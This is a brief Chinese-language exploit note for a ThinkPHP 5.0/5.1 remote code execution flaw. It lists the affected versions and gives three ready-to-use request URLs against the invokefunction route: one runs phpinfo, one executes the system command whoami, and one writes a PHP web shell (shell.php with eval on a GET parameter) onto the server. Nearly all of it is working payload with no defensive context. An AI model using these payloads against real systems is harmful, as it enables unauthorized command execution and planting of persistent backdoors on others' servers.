影响范围
ThinkPHP 5.0.x < 5.0.23 ThinkPHP 5.1.x < 5.1.31
漏洞POC
phpinfo:
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
系统命令执行:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
写shell:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_GET["cmd"])?>